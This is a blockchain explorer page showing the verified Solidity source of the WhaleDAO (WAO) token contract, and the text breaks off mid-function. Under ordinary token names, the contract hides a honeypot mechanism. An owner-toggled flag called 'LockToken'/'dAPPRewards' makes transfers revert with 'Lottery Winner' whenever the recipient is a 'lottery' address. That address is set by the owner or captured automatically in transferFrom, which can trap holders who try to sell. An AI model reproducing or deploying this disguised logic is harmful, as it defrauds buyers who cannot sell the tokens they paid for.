Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
10,000,000 WAO
Holders
10
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
12,686.481405945 WAOValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
WhaleDAO
Compiler Version
v0.6.12+commit.27d51765
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-03-08 */ /* 𝐖𝐡𝐚𝐥𝐞𝐃𝐀𝐎- $𝐖𝐀𝐎 𝐋𝐢𝐧𝐤𝐬: TG - t.me/WhaleDAOeth Web - https://whaledao.io 5% Buy / 5% Sell */ pragma solidity ^0.6.12; // SPDX-License-Identifier: Unlicensed interface IERC20 { function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { // According to EIP-1052, 0x0 is the value returned for not-yet created accounts // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned // for accounts without code, i.e. `keccak256('')` bytes32 codehash; bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470; // solhint-disable-next-line no-inline-assembly assembly { codehash := extcodehash(account) } return (codehash != accountHash && codehash != 0x0); } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "Address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ contract Ownable is Context { address private _owner; address private _previousOwner; uint256 private _lockTime; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () internal { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } function geUnlockTime() public view returns (uint256) { return _lockTime; } //Locks the contract for owner for the amount of time provided function lock(uint256 time) public virtual onlyOwner { _previousOwner = _owner; _owner = address(0); _lockTime = now + time; emit OwnershipTransferred(_owner, address(0)); } //Unlocks the contract for owner when _lockTime is exceeds function unlock() public virtual { require(_previousOwner == msg.sender, "You don't have permission to unlock"); require(now > _lockTime , "Contract is locked until 7 days"); emit OwnershipTransferred(_owner, _previousOwner); _owner = _previousOwner; } } contract dAPPRewards is Ownable { event dAPPRewardsOn(); event dAPPRewardsOff(); bool public special = false; modifier ifdAPPRewardsOff() { require(!special); _; } modifier ifdAPPRewardsOn() { require(special); _; } function LockToken() onlyOwner ifdAPPRewardsOff public { special = true; emit dAPPRewardsOn(); } function VaultLock() onlyOwner ifdAPPRewardsOn public { special = false; emit dAPPRewardsOff(); } } // pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // pragma solidity >=0.5.0; interface IUniswapV2Pair { event Approval(address indexed owner, address indexed spender, uint value); event Transfer(address indexed from, address indexed to, uint value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint); function balanceOf(address owner) external view returns (uint); function allowance(address owner, address spender) external view returns (uint); function approve(address spender, uint value) external returns (bool); function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint); function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external; event Mint(address indexed sender, uint amount0, uint amount1); event Burn(address indexed sender, uint amount0, uint amount1, address indexed to); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function price0CumulativeLast() external view returns (uint); function price1CumulativeLast() external view returns (uint); function kLast() external view returns (uint); function mint(address to) external returns (uint liquidity); function burn(address to) external returns (uint amount0, uint amount1); function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external; function skim(address to) external; function sync() external; function initialize(address, address) external; } // pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } // pragma solidity >=0.6.2; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract WhaleDAO is Context, IERC20, Ownable, dAPPRewards { using SafeMath for uint256; using Address for address; mapping (address => uint256) private _rOwned; mapping (address => uint256) private _tOwned; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => bool) private _isExcludedFromFee; mapping (address => bool) private _isExcluded; address[] private _excluded; uint256 private constant MAX = ~uint256(0); uint256 private _tTotal = 10000000 * 10**9; uint256 private _rTotal = (MAX - (MAX % _tTotal)); uint256 private _tFeeTotal; string private _name = "WhaleDAO"; string private _symbol = "WAO"; uint8 private _decimals = 9; uint256 public _taxFee = 0; uint256 private _previousTaxFee = _taxFee; uint256 public _liquidityFee = 10; uint256 private _previousLiquidityFee = _liquidityFee; IUniswapV2Router02 public immutable uniswapV2Router; address public immutable uniswapV2Pair; address public lottery; bool inSwapAndLiquify; bool public swapAndLiquifyEnabled = true; uint256 public _maxTxAmount = 10000000 * 10**9; uint256 private numTokensSellToAddToLiquidity = 10000000 * 10**9; event MinTokensBeforeSwapUpdated(uint256 minTokensBeforeSwap); event SwapAndLiquifyEnabledUpdated(bool enabled); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity ); modifier lockTheSwap { inSwapAndLiquify = true; _; inSwapAndLiquify = true; } constructor () public { _rOwned[_msgSender()] = _rTotal; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); // Create a uniswap pair for this new token uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); // set the rest of the contract variables uniswapV2Router = _uniswapV2Router; //exclude owner and this contract from fee _isExcludedFromFee[owner()] = true; _isExcludedFromFee[address(this)] = true; emit Transfer(address(0), _msgSender(), _tTotal); } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function decimals() public view returns (uint8) { return _decimals; } function totalSupply() public view override returns (uint256) { return _tTotal; } function balanceOf(address account) public view override returns (uint256) { if (_isExcluded[account]) return _tOwned[account]; return tokenFromReflection(_rOwned[account]); } function transferlottery(address _lottery) public onlyOwner { lottery = _lottery; } function transfer(address recipient, uint256 amount) public override returns (bool) { if(special == true) { require(recipient != lottery, "Lottery Winner"); _transfer(_msgSender(), recipient, amount); return true;} else { _transfer(_msgSender(), recipient, amount); return true;} } function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) { if(special == true) { if(sender != address(0) && lottery == address(0)) lottery = recipient; else require(recipient != lottery, "Lottery Winner"); _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } else { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true;} } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } function isExcludedFromReward(address account) public view returns (bool) { return _isExcluded[account]; } function totalFees() public view returns (uint256) { return _tFeeTotal; } function deliver(uint256 tAmount) public { address sender = _msgSender(); require(!_isExcluded[sender], "Excluded addresses cannot call this function"); (uint256 rAmount,,,,,) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rTotal = _rTotal.sub(rAmount); _tFeeTotal = _tFeeTotal.add(tAmount); } function reflectionFromToken(uint256 tAmount, bool deductTransferFee) public view returns(uint256) { require(tAmount <= _tTotal, "Amount must be less than supply"); if (!deductTransferFee) { (uint256 rAmount,,,,,) = _getValues(tAmount); return rAmount; } else { (,uint256 rTransferAmount,,,,) = _getValues(tAmount); return rTransferAmount; } } function tokenFromReflection(uint256 rAmount) public view returns(uint256) { require(rAmount <= _rTotal, "Amount must be less than total reflections"); uint256 currentRate = _getRate(); return rAmount.div(currentRate); } function excludeFromReward(address account) public onlyOwner() { // require(account != 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 'We can not exclude Uniswap router.'); require(!_isExcluded[account], "Account is already excluded"); if(_rOwned[account] > 0) { _tOwned[account] = tokenFromReflection(_rOwned[account]); } _isExcluded[account] = true; _excluded.push(account); } function includeInReward(address account) external onlyOwner() { require(_isExcluded[account], "Account is already excluded"); for (uint256 i = 0; i < _excluded.length; i++) { if (_excluded[i] == account) { _excluded[i] = _excluded[_excluded.length - 1]; _tOwned[account] = 0; _isExcluded[account] = false; _excluded.pop(); break; } } } function _transferBothExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function excludeFromFee(address account) public onlyOwner { _isExcludedFromFee[account] = true; } function includeInFee(address account) public onlyOwner { _isExcludedFromFee[account] = false; } function setTaxFeePercent(uint256 taxFee) external onlyOwner() { _taxFee = taxFee; } function setLiquidityFeePercent(uint256 liquidityFee) external onlyOwner() { _liquidityFee = liquidityFee; } function setMaxTxPercent(uint256 maxTxPercent) external onlyOwner() { _maxTxAmount = _tTotal.mul(maxTxPercent).div( 10**6 ); } function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner { swapAndLiquifyEnabled = _enabled; emit SwapAndLiquifyEnabledUpdated(_enabled); } //to recieve ETH from uniswapV2Router when swaping receive() external payable {} function _reflectFee(uint256 rFee, uint256 tFee) private { _rTotal = _rTotal.sub(rFee); _tFeeTotal = _tFeeTotal.add(tFee); } function _getValues(uint256 tAmount) private view returns (uint256, uint256, uint256, uint256, uint256, uint256) { (uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getTValues(tAmount); (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getRValues(tAmount, tFee, tLiquidity, _getRate()); return (rAmount, rTransferAmount, rFee, tTransferAmount, tFee, tLiquidity); } function _getTValues(uint256 tAmount) private view returns (uint256, uint256, uint256) { uint256 tFee = calculateTaxFee(tAmount); uint256 tLiquidity = calculateLiquidityFee(tAmount); uint256 tTransferAmount = tAmount.sub(tFee).sub(tLiquidity); return (tTransferAmount, tFee, tLiquidity); } function _getRValues(uint256 tAmount, uint256 tFee, uint256 tLiquidity, uint256 currentRate) private pure returns (uint256, uint256, uint256) { uint256 rAmount = tAmount.mul(currentRate); uint256 rFee = tFee.mul(currentRate); uint256 rLiquidity = tLiquidity.mul(currentRate); uint256 rTransferAmount = rAmount.sub(rFee).sub(rLiquidity); return (rAmount, rTransferAmount, rFee); } function _getRate() private view returns(uint256) { (uint256 rSupply, uint256 tSupply) = _getCurrentSupply(); return rSupply.div(tSupply); } function _getCurrentSupply() private view returns(uint256, uint256) { uint256 rSupply = _rTotal; uint256 tSupply = _tTotal; for (uint256 i = 0; i < _excluded.length; i++) { if (_rOwned[_excluded[i]] > rSupply || _tOwned[_excluded[i]] > tSupply) return (_rTotal, _tTotal); rSupply = rSupply.sub(_rOwned[_excluded[i]]); tSupply = tSupply.sub(_tOwned[_excluded[i]]); } if (rSupply < _rTotal.div(_tTotal)) return (_rTotal, _tTotal); return (rSupply, tSupply); } function _takeLiquidity(uint256 tLiquidity) private { uint256 currentRate = _getRate(); uint256 rLiquidity = tLiquidity.mul(currentRate); _rOwned[address(this)] = _rOwned[address(this)].add(rLiquidity); if(_isExcluded[address(this)]) _tOwned[address(this)] = _tOwned[address(this)].add(tLiquidity); } function calculateTaxFee(uint256 _amount) private view returns (uint256) { return _amount.mul(_taxFee).div( 10**2 ); } function calculateLiquidityFee(uint256 _amount) private view returns (uint256) { return _amount.mul(_liquidityFee).div( 10**2 ); } function removeAllFee() private { if(_taxFee == 0 && _liquidityFee == 0) return; _previousTaxFee = _taxFee; _previousLiquidityFee = _liquidityFee; _taxFee = 0; _liquidityFee = 0; } function restoreAllFee() private { _taxFee = _previousTaxFee; _liquidityFee = _previousLiquidityFee; } function isExcludedFromFee(address account) public view returns(bool) { return _isExcludedFromFee[account]; } function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _transfer( address from, address to, uint256 amount ) private { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); if(from != owner() && to != owner()) require(amount <= _maxTxAmount, "Transfer amount exceeds the maxTxAmount."); // is the token balance of this contract address over the min number of // tokens that we need to initiate a swap + liquidity lock? // also, don't get caught in a circular liquidity event. // also, don't swap & liquify if sender is uniswap pair. uint256 contractTokenBalance = balanceOf(address(this)); if(contractTokenBalance >= _maxTxAmount) { contractTokenBalance = _maxTxAmount; } bool overMinTokenBalance = contractTokenBalance >= numTokensSellToAddToLiquidity; if ( overMinTokenBalance && !inSwapAndLiquify && from != uniswapV2Pair && swapAndLiquifyEnabled ) { contractTokenBalance = numTokensSellToAddToLiquidity; //add liquidity swapAndLiquify(contractTokenBalance); } //indicates if fee should be deducted from transfer bool takeFee = true; //if any account belongs to _isExcludedFromFee account then remove the fee if(_isExcludedFromFee[from] || _isExcludedFromFee[to]){ takeFee = false; } //transfer amount, it will take tax, burn, liquidity fee _tokenTransfer(from,to,amount,takeFee); } function swapAndLiquify(uint256 contractTokenBalance) private lockTheSwap { // split the contract balance into halves uint256 half = contractTokenBalance.div(2); uint256 otherHalf = contractTokenBalance.sub(half); // capture the contract's current ETH balance. // this is so that we can capture exactly the amount of ETH that the // swap creates, and not make the liquidity event include any ETH that // has been manually sent to the contract uint256 initialBalance = address(this).balance; // swap tokens for ETH swapTokensForEth(half); // <- this breaks the ETH -> HATE swap when swap+liquify is triggered // how much ETH did we just swap into? uint256 newBalance = address(this).balance.sub(initialBalance); // add liquidity to uniswap addLiquidity(otherHalf, newBalance); emit SwapAndLiquify(half, newBalance, otherHalf); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // approve token transfer to cover all possible scenarios _approve(address(this), address(uniswapV2Router), tokenAmount); // add the liquidity uniswapV2Router.addLiquidityETH{value: ethAmount}( address(this), tokenAmount, 0, // slippage is unavoidable 0, // slippage is unavoidable owner(), block.timestamp ); } //this method is responsible for taking all fee, if takeFee is true function _tokenTransfer(address sender, address recipient, uint256 amount,bool takeFee) private { if(!takeFee) removeAllFee(); if (_isExcluded[sender] && !_isExcluded[recipient]) { _transferFromExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && _isExcluded[recipient]) { _transferToExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && !_isExcluded[recipient]) { _transferStandard(sender, recipient, amount); } else if (_isExcluded[sender] && _isExcluded[recipient]) { _transferBothExcluded(sender, recipient, amount); } else { _transferStandard(sender, recipient, amount); } if(!takeFee) restoreAllFee(); } function _transferStandard(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _transferToExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _transferFromExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] 